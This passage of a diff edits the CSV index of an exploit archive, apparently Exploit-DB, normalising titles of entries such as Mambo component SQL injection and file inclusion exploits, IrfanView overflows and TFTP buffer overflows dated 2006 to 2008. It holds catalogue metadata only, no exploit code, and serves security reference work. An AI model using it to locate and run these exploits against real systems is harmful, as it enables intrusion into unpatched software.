Inclusion",2006-10-22,Drago84,php,webapps,0 2615,platforms/php/webapps/2615.txt,"SpeedBerg 1.2beta1 - (SPEEDBERG_PATH) File Inclusion",2006-10-22,k1tk4t,php,webapps,0 2616,platforms/php/webapps/2616.php,"JaxUltraBB 2.0 - (delete.php) Remote Auto Deface Exploit",2006-10-22,Kacper,php,webapps,0 @@ -2533,7 +2533,7 @@ id,file,description,date,author,platform,type,port 2849,platforms/asp/webapps/2849.txt,"ASP-Nuke Community 1.5 - Cookie Privilege Escalation",2006-11-25,ajann,asp,webapps,0 2850,platforms/php/webapps/2850.txt,"Exhibit Engine 1.22 - (styles.php) Remote File Inclusion",2006-11-25,Kacper,php,webapps,0 2851,platforms/php/webapps/2851.txt,"Hacks List phpBB Mod 1.21 - SQL Injection",2006-11-26,"the master",php,webapps,0 -2852,platforms/php/webapps/2852.txt,"com_flyspray Mambo Com. <= 1.0.1 - Remote File Disclosure",2006-11-26,3l3ctric-Cracker,php,webapps,0 +2852,platforms/php/webapps/2852.txt,"Mambo Component com_flyspray <= 1.0.1 - Remote File Disclosure",2006-11-26,3l3ctric-Cracker,php,webapps,0 2853,platforms/asp/webapps/2853.txt,"SimpleBlog 2.3 - (admin/edit.asp) SQL Injection",2006-11-26,bolivar,asp,webapps,0 2854,platforms/windows/dos/2854.py,"AT-TFTP 1.9 - (Long Filename) Remote Buffer Overflow (PoC)",2006-11-27,"Liu Qixu",windows,dos,0 2855,platforms/windows/dos/2855.py,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow (PoC)",2006-11-27,"Liu Qixu",windows,dos,0 @@ -2549,7 +2549,7 @@ id,file,description,date,author,platform,type,port 2865,platforms/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow Exploit",2006-11-30,cthulhu,windows,remote,69 2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch - (ActiveX Control) Command Execution",2006-11-30,"Tan Chew Keong",windows,remote,0 2867,platforms/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit",2006-11-30,rgod,php,webapps,0 -2869,platforms/php/webapps/2869.php,"Serendipity 1.0.3 - 'comment.php' Local File Inclusion",2006-11-30,Kacper,php,webapps,0 +2869,platforms/php/webapps/2869.php,"S9Y Serendipity 1.0.3 - 'comment.php' Local File Inclusion",2006-11-30,Kacper,php,webapps,0 2870,platforms/windows/remote/2870.rb,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow (Metasploit)",2006-11-30,"Greg Linares",windows,remote,0 2871,platforms/php/webapps/2871.txt,"LDU 8.x - (polls.php) SQL Injection",2006-11-30,ajann,php,webapps,0 2872,platforms/windows/local/2872.c,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow",2006-11-30,Expanders,windows,local,0 @@ -2638,7 +2638,7 @@ id,file,description,date,author,platform,type,port 2958,platforms/php/webapps/2958.txt,"cwmVote 1.0 - (archive.php) Remote File Inclusion",2006-12-19,bd0rk,php,webapps,0 2959,platforms/linux/remote/2959.sql,"Oracle 9i / 10g - File System Access via utl_file Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0 2960,platforms/php/webapps/2960.pl,"cwmCounter 5.1.1 - (statistic.php) Remote File Inclusion",2006-12-19,bd0rk,php,webapps,0 -2961,platforms/hardware/dos/2961.py,"Hewlett-Packard FTP Print Server 2.4.5 - Buffer Overflow (PoC)",2006-12-19,"Joxean Koret",hardware,dos,0 +2961,platforms/hardware/dos/2961.py,"Hewlett-Packard (HP) FTP Print Server 2.4.5 - Buffer Overflow (PoC)",2006-12-19,"Joxean Koret",hardware,dos,0 2962,platforms/asp/webapps/2962.txt,"Burak Yilmaz Download Portal - 'down.asp' SQL Injection",2006-12-19,ShaFuck31,asp,webapps,0 2963,platforms/asp/webapps/2963.txt,"cwmExplorer 1.0 - (show_file) Source Code Disclosure",2006-12-19,ajann,asp,webapps,0 2964,platforms/php/webapps/2964.txt,"Valdersoft Shopping Cart 3.0 - Multiple Remote File Inclusion",2006-12-20,mdx,php,webapps,0 @@ -3206,7 +3206,7 @@ id,file,description,date,author,platform,type,port 3536,platforms/asp/webapps/3536.txt,"Active Photo Gallery - 'default.asp catid' SQL Injection",2007-03-21,CyberGhost,asp,webapps,0 3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 (Windows 2000 SP4) - IMAP (Subscribe) Remote Exploit",2007-03-21,"Winny Thomas",windows,remote,143 3538,platforms/php/webapps/3538.txt,"PHP-revista 1.1.2 - Multiple SQL Injections",2007-03-21,"Cold Zero",php,webapps,0 -3539,platforms/php/webapps/3539.txt,"mambo Component nfnaddressbook 0.4 - Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0 +3539,platforms/php/webapps/3539.txt,"Mambo Component nfnaddressbook 0.4 - Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0 3540,platforms/windows/remote/3540.py,"Mercur Messaging 2005 <= SP4 - IMAP Remote Exploit (Egghunter)",2007-03-21,muts,windows,remote,143 3541,platforms/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 - Remote Overwrite (SEH)",2007-03-22,"Umesh Wanve",windows,remote,69 3542,platforms/php/webapps/3542.txt,"ClassWeb 2.0.3 - (BASE) Remote File Inclusion",2007-03-22,GoLd_M,php,webapps,0 @@ -3223,7 +3223,7 @@ id,file,description,date,author,platform,type,port 3554,platforms/linux/remote/3554.pm,"dproxy 0.5 - Remote Buffer Overflow (Metasploit)",2007-03-23,"Alexander Klink",linux,remote,53 3555,platforms/multiple/remote/3555.pl,"Ethernet Device Drivers Frame Padding - Info Leakage Exploit (Etherleak)",2007-03-23,"Jon Hart",multiple,remote,0 3556,platforms/asp/webapps/3556.htm,"Active NewsLetter 4.3 - (ViewNewspapers.asp) SQL Injection",2007-03-23,ajann,asp,webapps,0 -3557,platforms/php/webapps/3557.txt,"Joomla! / Mambo Component SWmenuFree 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 +3557,platforms/php/webapps/3557.txt,"Joomla! / Mambo Component 'com_swmenupro' 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 3558,platforms/asp/webapps/3558.htm,"eWebquiz 8 - 'eWebQuiz.asp' SQL Injection",2007-03-23,ajann,asp,webapps,0 3559,platforms/multiple/local/3559.php,"PHP 5.2.1 - Unserialize() Local Information Leak Exploit",2007-03-23,"Stefan Esser",multiple,local,0 3560,platforms/php/webapps/3560.txt,"Joomla! Component Joomlaboard 1.1.1 - (sbp) Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 @@ -3310,7 +3310,7 @@ id,file,description,date,author,platform,type,port 3645,platforms/php/webapps/3645.htm,"XOOPS Module XFsection 1.07 - 'articleId' Blind SQL Injection",2007-04-02,ajann,php,webapps,0 3646,platforms/php/webapps/3646.pl,"XOOPS Module Zmagazine 1.0 - (print.php) SQL Injection",2007-04-02,ajann,php,webapps,0 3647,platforms/windows/local/3647.c,"Microsoft Windows - Animated Cursor '.ani' Local Buffer Overflow",2007-04-02,Marsu,windows,local,0 -3648,platforms/windows/local/3648.c,"Irfanview 3.99 - '.ani' Local Buffer Overflow (1)",2007-04-02,Marsu,windows,local,0 +3648,platforms/windows/local/3648.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (1)",2007-04-02,Marsu,windows,local,0 3649,platforms/windows/local/3649.c,"Ipswitch WS_FTP 5.05 - Server Manager Local Site Buffer Overflow",2007-04-02,Marsu,windows,local,0 3650,platforms/windows/remote/3650.c,"Frontbase 4.2.7 - Authenticated Remote Buffer Overflow (2.2)",2007-04-02,Heretic2,windows,remote,0 3651,platforms/windows/remote/3651.txt,"Microsoft Windows - Animated Cursor '.ani' Universal Exploit Generator",2007-04-03,"YAG KOHHA",windows,remote,0 @@ -3353,7 +3353,7 @@ id,file,description,date,author,platform,type,port 3689,platforms/php/webapps/3689.txt,"PcP-Guestbook 3.0 - 'lang' Local File Inclusion",2007-04-08,Dj7xpl,php,webapps,0 3690,platforms/windows/dos/3690.txt,"Microsoft Word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0 3691,platforms/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 - SQL Injection",2007-04-09,"h a c k e r _ X",php,webapps,0 -3692,platforms/windows/local/3692.c,"Irfanview 3.99 - '.ani' Local Buffer Overflow (2)",2007-04-09,"Breno Silva Pinto",windows,local,0 +3692,platforms/windows/local/3692.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (2)",2007-04-09,"Breno Silva Pinto",windows,local,0 3693,platforms/windows/dos/3693.txt,"Microsoft Windows - '.hlp' Local HEAP Overflow (PoC)",2007-04-09,muts,windows,dos,0 3694,platforms/php/webapps/3694.txt,"PHP121 Instant Messenger 2.2 - Local File Inclusion",2007-04-09,Dj7xpl,php,webapps,0 3695,platforms/windows/local/3695.c,"Microsoft Windows - Animated Cursor '.ani' Local Overflow",2007-04-09,"Breno Silva Pinto",windows,local,0 @@ -3364,7 +3364,7 @@ id,file,description,date,author,platform,type,port 3700,platforms/php/webapps/3700.txt,"Weatimages 1.7.1 - ini[langpack] Remote File Inclusion",2007-04-10,Co-Sarper-Der,php,webapps,0 3701,platforms/php/webapps/3701.txt,"Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution",2007-04-10,Xst3nZ,php,webapps,0 3702,platforms/php/webapps/3702.php,"InoutMailingListManager 3.1 - Remote Command Execution",2007-04-10,BlackHawk,php,webapps,0 -3703,platforms/php/webapps/3703.txt,"Joomla! / Mambo Component Taskhopper 1.1 - Remote File Inclusion",2007-04-10,"Cold Zero",php,webapps,0 +3703,platforms/php/webapps/3703.txt,"Joomla! / Mambo Component 'com_thopper' 1.1 - Remote File Inclusion",2007-04-10,"Cold Zero",php,webapps,0 3704,platforms/php/webapps/3704.txt,"pl-PHP Beta 0.9 - Multiple Vulnerabilities",2007-04-10,Omni,php,webapps,0 3705,platforms/php/webapps/3705.txt,"SimpCMS 04.10.2007 - (site) Remote File Inclusion",2007-04-10,Dr.RoVeR,php,webapps,0 3706,platforms/php/webapps/3706.txt,"Mambo Component zOOm Media Gallery 2.5 Beta 2 - Remote File Inclusion",2007-04-11,iskorpitx,php,webapps,0 @@ -3396,7 +3396,7 @@ id,file,description,date,author,platform,type,port 3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x - (class.Smarty.php) Remote File Inclusion",2007-04-14,irvian,php,webapps,0 3734,platforms/php/webapps/3734.txt,"Joomla! Component module autostand 1.0 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 3735,platforms/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution",2007-04-14,Gammarays,php,webapps,0 -3736,platforms/php/webapps/3736.txt,"Joomla! / Mambo Component article 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 +3736,platforms/php/webapps/3736.txt,"Joomla! / Mambo Component 'com_articles' 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 3737,platforms/windows/remote/3737.py,"Microsoft Windows 2000 SP4 - DNS RPC Remote Buffer Overflow",2007-04-15,"Winny Thomas",windows,remote,139 3738,platforms/windows/remote/3738.php,"XAMPP for Windows 1.6.0a - mssql_connect() Remote Buffer Overflow",2007-04-15,rgod,windows,remote,80 3739,platforms/php/webapps/3739.php,"Papoo 3.02 - (kontakt menuid) SQL Injection",2007-04-15,Kacper,php,webapps,0 @@ -3471,7 +3471,7 @@ id,file,description,date,author,platform,type,port 3808,platforms/windows/remote/3808.html,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)",2007-04-27,shinnai,windows,remote,0 3809,platforms/php/webapps/3809.txt,"burnCMS 0.2 - (root) Remote File Inclusion",2007-04-27,GoLd_M,php,webapps,0 3810,platforms/windows/remote/3810.html,"IPIX Image Well ActiveX - 'iPIX-ImageWell-ipix.dll' Buffer Overflow",2007-04-27,"Umesh Wanve",windows,remote,0 -3811,platforms/windows/local/3811.c,"Irfanview 4.00 - '.iff' Buffer Overflow",2007-04-27,Marsu,windows,local,0 +3811,platforms/windows/local/3811.c,"IrfanView 4.00 - '.iff' Buffer Overflow",2007-04-27,Marsu,windows,local,0 3812,platforms/windows/local/3812.c,"Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png' Buffer Overflow",2007-04-27,Marsu,windows,local,0 3813,platforms/php/webapps/3813.txt,"PostNuke pnFlashGames Module 1.5 - SQL Injection",2007-04-28,"Mehmet Ince",php,webapps,0 3814,platforms/php/webapps/3814.txt,"WordPress Plugin mygallery 1.4b4 - Remote File Inclusion",2007-04-29,GoLd_M,php,webapps,0 @@ -3602,7 +3602,7 @@ id,file,description,date,author,platform,type,port 3941,platforms/php/webapps/3941.txt,"PHPGlossar 0.8 - (format_menue) Remote File Inclusion",2007-05-16,kezzap66345,php,webapps,0 3942,platforms/php/webapps/3942.pl,"SimpNews 2.40.01 - (print.php newnr) SQL Injection",2007-05-16,Silentz,php,webapps,0 3943,platforms/php/webapps/3943.pl,"FAQEngine 4.16.03 - (question.php questionref) SQL Injection",2007-05-16,Silentz,php,webapps,0 -3944,platforms/php/webapps/3944.txt,"Mambo com_yanc 1.4 Beta - 'id' SQL Injection",2007-05-17,"Mehmet Ince",php,webapps,0 +3944,platforms/php/webapps/3944.txt,"Mambo Component com_yanc 1.4 Beta - 'id' SQL Injection",2007-05-17,"Mehmet Ince",php,webapps,0 3945,platforms/linux/dos/3945.rb,"MagicISO 5.4 (build239) - '.cue' Heap Overflow (PoC)",2007-05-17,n00b,linux,dos,0 3946,platforms/php/webapps/3946.txt,"GeekLog 2.x - ImageImageMagick.php Remote File Inclusion",2007-05-17,diesl0w,php,webapps,0 3947,platforms/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusion",2007-05-17,"Alkomandoz Hacker",php,webapps,0 @@ -4342,7 +4342,7 @@ id,file,description,date,author,platform,type,port 4688,platforms/windows/dos/4688.html,"VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization",2007-12-04,"Ricardo Narvaja",windows,dos,0 4689,platforms/osx/dos/4689.c,"Apple Mac OSX xnu 1228.0 - mach-o Local Kernel Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0 4690,platforms/osx/dos/4690.c,"Apple Mac OSX 10.5.0 (Leopard) - vpnd Remote Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0 -4691,platforms/php/webapps/4691.txt,"Joomla! / Mambo Component rsgallery 2.0b5 - 'catid' SQL Injection",2007-12-05,K-159,php,webapps,0 +4691,platforms/php/webapps/4691.txt,"Joomla! / Mambo Component 'com_rsgallery' 2.0b5 - 'catid' SQL Injection",2007-12-05,K-159,php,webapps,0 4692,platforms/hardware/dos/4692.pl,"Cisco Phone 7940 - Remote Denial of Service",2007-12-05,MADYNES,hardware,dos,0 4693,platforms/php/webapps/4693.txt,"SineCMS 2.3.4 - Calendar SQL Injection",2007-12-05,KiNgOfThEwOrLd,php,webapps,0 4694,platforms/php/webapps/4694.txt,"EZContents 1.4.5 - (index.php link) Remote File Disclosure",2007-12-05,p4imi0,php,webapps,0 @@ -4645,7 +4645,7 @@ id,file,description,date,author,platform,type,port 4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys Password)",2008-01-28,sh2kerr,multiple,local,0 4997,platforms/multiple/dos/4997.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg Buffer Overflow (PoC)",2008-01-28,sh2kerr,multiple,dos,0 -4998,platforms/windows/local/4998.c,"Irfanview 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,windows,local,0 +4998,platforms/windows/local/4998.c,"IrfanView 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,windows,local,0 4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 - 'MailBee.dll' Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0 5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - 'page_courante' Parameter Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0 5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - 'uri' Parameter Remote File Disclosure",2008-01-28,Stack,php,webapps,0 @@ -4654,10 +4654,10 @@ id,file,description,date,author,platform,type,port 5004,platforms/windows/local/5004.c,"SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0 5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0 5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - 'file' Parameter Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0 -5007,platforms/php/webapps/5007.txt,"Mambo 4.5 'com_newsletter' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0 -5008,platforms/php/webapps/5008.txt,"Mambo 'com_fq' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0 -5009,platforms/php/webapps/5009.txt,"Mambo 'com_mamml' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0 -5010,platforms/php/webapps/5010.txt,"Mambo Component Glossary 2.0 - 'catid' SQL Injection",2008-01-30,S@BUN,php,webapps,0 +5007,platforms/php/webapps/5007.txt,"Mambo Component 'com_newsletter' 4.5 - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0 +5008,platforms/php/webapps/5008.txt,"Mambo Component 'com_fq' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0 +5009,platforms/php/webapps/5009.txt,"Mambo Component 'com_mamml' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0 +5010,platforms/php/webapps/5010.txt,"Mambo Component 'com_glossary' 2.0 - 'catid' SQL Injection",2008-01-30,S@BUN,php,webapps,0 5011,platforms/php/webapps/5011.txt,"Mambo Component musepoes - (aid) SQL Injection",2008-01-30,S@BUN,php,webapps,0 5012,platforms/php/webapps/5012.pl,"Connectix Boards 0.8.2 - template_path Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0 5013,platforms/php/webapps/5013.php,"WordPress Plugin Adserve 0.2 - adclick.php SQL Injection",2008-01-30,enter_the_dragon,php,webapps,0 @@ -4674,8 +4674,8 @@ id,file,description,date,author,platform,type,port 5026,platforms/php/webapps/5026.txt,"Mindmeld 1.2.0.10 - Multiple Remote File Inclusion",2008-01-31,"David Wharton",php,webapps,0 5027,platforms/php/webapps/5027.txt,"sflog! 0.96 - Remote File Disclosure",2008-01-31,muuratsalo,php,webapps,0 5028,platforms/windows/remote/5028.html,"Chilkat FTP ActiveX 2.0 - 'ChilkatCert.dll' Insecure Method Exploit",2008-01-31,darkl0rd,windows,remote,0 -5029,platforms/php/webapps/5029.txt,"Mambo Component AkoGallery 2.5b - SQL Injection",2008-01-31,S@BUN,php,webapps,0 -5030,platforms/php/webapps/5030.txt,"Mambo Component Catalogshop 1.0b1 - SQL Injection",2008-01-31,S@BUN,php,webapps,0 +5029,platforms/php/webapps/5029.txt,"Mambo Component 'com_akogallery' 2.5b - SQL Injection",2008-01-31,S@BUN,php,webapps,0 +5030,platforms/php/webapps/5030.txt,"Mambo Component 'com_catalogshop' 1.0b1 - SQL Injection",2008-01-31,S@BUN,php,webapps,0 5031,platforms/php/webapps/5031.txt,"Mambo Component Restaurant 1.0 - SQL Injection",2008-01-31,S@BUN,php,webapps,0 5032,platforms/windows/local/5032.c,"Total Video Player 1.03 - '.m3u' File Local Buffer Overflow",2008-02-01,"fl0 fl0w",windows,local,0 5033,platforms/php/webapps/5033.txt,"LightBlog 9.5 - cp_upload_image.php Arbitrary File Upload",2008-02-01,Omni,php,webapps,0 @@ -4702,7 +4702,7 @@ id,file,description,date,author,platform,type,port 5055,platforms/php/webapps/5055.txt,"Joomla! Component com_Marketplace 1.1.1 - SQL Injection",2008-02-03,"SoSo H H",php,webapps,0 5056,platforms/php/webapps/5056.txt,"ITechBids 5.0 - (bidhistory.php item_id) SQL Injection",2008-02-04,QTRinux,php,webapps,0 5057,platforms/php/webapps/5057.txt,"XOOPS 2.0.18 - Local File Inclusion / URL Redirecting",2008-02-04,DSecRG,php,webapps,0 -5058,platforms/php/webapps/5058.txt,"Mambo Component Awesom 0.3.2 - (listid) SQL Injection",2008-02-04,S@BUN,php,webapps,0 +5058,platforms/php/webapps/5058.txt,"Mambo Component 'com_awesom' 0.3.2 - (listid) SQL Injection",2008-02-04,S@BUN,php,webapps,0 5059,platforms/php/webapps/5059.txt,"Mambo Component Shambo2 - 'itemID' SQL Injection",2008-02-04,S@BUN,php,webapps,0 5060,platforms/php/webapps/5060.txt,"VHD Web Pack 2.0 - 'index.php' Local File Inclusion",2008-02-04,DSecRG,php,webapps,0 5061,platforms/php/webapps/5061.txt,"All Club CMS 0.0.1f - 'index.php' Local File Inclusion",2008-02-04,Trancek,php,webapps,0 @@ -4783,7 +4783,7 @@ id,file,description,date,author,platform,type,port 5136,platforms/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Arbitrary File Upload",2008-02-17,ZoRLu,php,webapps,0 5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 - (download.php url) Remote File Disclosure",2008-02-17,GoLd_M,php,webapps,0 5138,platforms/php/webapps/5138.txt,"Joomla! Component astatsPRO 1.0 - refer.php SQL Injection",2008-02-18,ka0x,php,webapps,0 -5139,platforms/php/webapps/5139.txt,"Mambo Component Portfolio 1.0 - 'categoryId' SQL Injection",2008-02-18,"it's my",php,webapps,0 +5139,platforms/php/webapps/5139.txt,"Mambo Component 'com_portfolio' 1.0 - 'categoryId' SQL Injection",2008-02-18,"it's my",php,webapps,0 5140,platforms/php/webapps/5140.txt,"LightBlog 9.6 - 'Username' Local File Inclusion",2008-02-18,muuratsalo,php,webapps,0 5141,platforms/windows/local/5141.c,"DESlock+ <= 3.2.6 - 'LIST' Local Kernel Memory Leak (PoC)",2008-02-18,mu-b,windows,local,0 5142,platforms/windows/dos/5142.c,"DESlock+ <= 3.2.6 - 'DLMFENC.sys' Local Kernel Ring0 link list zero (PoC)",2008-02-18,mu-b,windows,dos,0 @@ -4920,7 +4920,7 @@ id,file,description,date,author,platform,type,port 5276,platforms/asp/webapps/5276.txt,"ASPapp Knowledge Base - 'links.asp CatId' SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 5277,platforms/php/webapps/5277.txt,"Joomla! Component joovideo 1.2.2 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 5278,platforms/php/webapps/5278.txt,"Joomla! Component Alberghi 2.1.3 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 -5279,platforms/php/webapps/5279.txt,"Mambo Component accombo 1.x - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 +5279,platforms/php/webapps/5279.txt,"Mambo Component 'com_accombo' 1.x - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 5280,platforms/php/webapps/5280.txt,"Joomla! Component Restaurante 1.0 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 5281,platforms/php/webapps/5281.php,"PEEL CMS - Admin Hash Extraction / Arbitrary File Upload",2008-03-19,"Charles Fol",php,webapps,0 5282,platforms/solaris/remote/5282.txt,"Sun Solaris 10 - rpc.ypupdated Remote Root Exploit",2008-03-20,kingcope,solaris,remote,0 @@ -4975,7 +4975,7 @@ id,file,description,date,author,platform,type,port 5332,platforms/windows/remote/5332.html,"Real Player - 'rmoc3260.dll' ActiveX Control Remote Code Execution",2008-04-01,Elazar,windows,remote,0 5333,platforms/php/webapps/5333.txt,"EasyNews 40tr - (SQL Injection / Cross-Site Scripting / Local File Inclusion) SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps,0 5334,platforms/php/webapps/5334.txt,"FaScript FaPhoto 1.0 - (show.php id) SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps,0 -5335,platforms/php/webapps/5335.txt,"Mambo Component ahsShop 1.51 - (vara) SQL Injection",2008-04-01,S@BUN,php,webapps,0 +5335,platforms/php/webapps/5335.txt,"Mambo Component 'com_ahsshop' 1.51 - 'vara' Parameter SQL Injection",2008-04-01,S@BUN,php,webapps,0 5336,platforms/php/webapps/5336.pl,"eggBlog 4.0 - Password Retrieve SQL Injection",2008-04-01,girex,php,webapps,0 5337,platforms/php/webapps/5337.txt,"Joomla! Component actualite 1.0 - 'id' SQL Injection",2008-04-01,Stack,php,webapps,0 5338,platforms/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite",2008-04-01,shinnai,windows,remote,0 @@ -5428,7 +5428,7 @@ id,file,description,date,author,platform,type,port 5796,platforms/php/webapps/5796.php,"GLLCTS2 <= 4.2.4 - (login.php detail) SQL Injection",2008-06-12,TheDefaced,php,webapps,0 5797,platforms/php/webapps/5797.txt,"Butterfly ORGanizer 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-13,"CWH Underground",php,webapps,0 5798,platforms/php/webapps/5798.pl,"WebChamado 1.1 - Arbitrary Add Admin",2008-06-13,"CWH Underground",php,webapps,0 -5799,platforms/php/webapps/5799.pl,"Mambo Component Galleries 1.0 - (aid) SQL Injection",2008-06-13,Houssamix,php,webapps,0 +5799,platforms/php/webapps/5799.pl,"Mambo Component 'com_galleries' 1.0 - 'aid' Parameter SQL Injection",2008-06-13,Houssamix,php,webapps,0 5800,platforms/php/webapps/5800.pl,"Butterfly ORGanizer 2.0.0 - Arbitrary Delete (Category/Account)",2008-06-13,Stack,php,webapps,0 5801,platforms/php/webapps/5801.txt,"Easy-Clanpage 3.0b1 - (section) Local File Inclusion",2008-06-13,Loader007,php,webapps,0 5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 - (tsk_id) SQL Injection",2008-06-13,"Virangar Security",php,webapps,0 @@ -5437,7 +5437,7 @@ id,file,description,date,author,platform,type,port 5805,platforms/asp/webapps/5805.txt,"E-Smart Cart - 'productsofcat.asp' SQL Injection",2008-06-13,JosS,asp,webapps,0 5806,platforms/php/webapps/5806.pl,"GLLCTS2 - 'listing.php sort' Blind SQL Injection",2008-06-13,anonymous,php,webapps,0 5807,platforms/php/webapps/5807.txt,"PHP JOBWEBSITE PRO - 'JobSearch3.php' SQL Injection",2008-06-13,JosS,php,webapps,0 -5808,platforms/php/webapps/5808.txt,"Mambo 4.6.4 - (Output.php) Remote File Inclusion",2008-06-13,irk4z,php,webapps,0 +5808,platforms/php/webapps/5808.txt,"Mambo 4.6.4 - 'Output.php' Remote File Inclusion",2008-06-13,irk4z,php,webapps,0 5809,platforms/php/webapps/5809.txt,"Pre Job Board - 'JobSearch.php' SQL Injection",2008-06-14,JosS,php,webapps,0 5810,platforms/php/webapps/5810.txt,"Contenido 4.8.4 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-14,RoMaNcYxHaCkEr,php,webapps,0 5811,platforms/php/webapps/5811.txt,"Family Connections CMS 1.4 - Multiple SQL Injections",2008-06-14,"CWH Underground",php,webapps,0 @@ -5562,7 +5562,7 @@ id,file,description,date,author,platform,type,port 5932,platforms/php/webapps/5932.txt,"Webdevindo-CMS 0.1 - (index.php hal) SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 5933,platforms/php/webapps/5933.txt,"mUnky 0.0.1 - (index.php zone) Local File Inclusion",2008-06-25,StAkeR,php,webapps,0 5934,platforms/php/webapps/5934.txt,"Jokes & Funny Pics Script - (sb_jokeid) SQL Injection",2008-06-25,"Hussin X",php,webapps,0 -5935,platforms/php/webapps/5935.pl,"Mambo Component Articles - (artid) Blind SQL Injection",2008-06-25,"Ded MustD!e",php,webapps,0 +5935,platforms/php/webapps/5935.pl,"Mambo Component 'articles' - 'artid' Parameter Blind SQL Injection",2008-06-25,"Ded MustD!e",php,webapps,0 5936,platforms/php/webapps/5936.txt,"Page Manager CMS 2006-02-04 - Arbitrary File Upload",2008-06-25,"CWH Underground",php,webapps,0 5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - (page.php pid) SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 5938,platforms/php/webapps/5938.php,"PHPmotion 2.0 - (update_profile.php) Arbitrary File Upload",2008-06-25,EgiX,php,webapps,0 @@ -5604,7 +5604,7 @@ id,file,description,date,author,platform,type,port 5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - (catalogue.php cat) SQL Injection",2008-06-30,n0c0py,php,webapps,0 5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - (chatbox.php) SQL Injection",2008-06-30,DNX,php,webapps,0 5979,platforms/openbsd/local/5979.c,"OpenBSD 4.0 - (vga) Privilege Escalation",2008-07-01,"lul-disclosure inc.",openbsd,local,0 -5980,platforms/php/webapps/5980.txt,"Mambo Component n-gallery - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0 +5980,platforms/php/webapps/5980.txt,"Mambo Component 'com_n-gallery' - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0 5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0 5982,platforms/php/webapps/5982.txt,"PHP-Agenda 2.2.4 - 'index.php' Local File 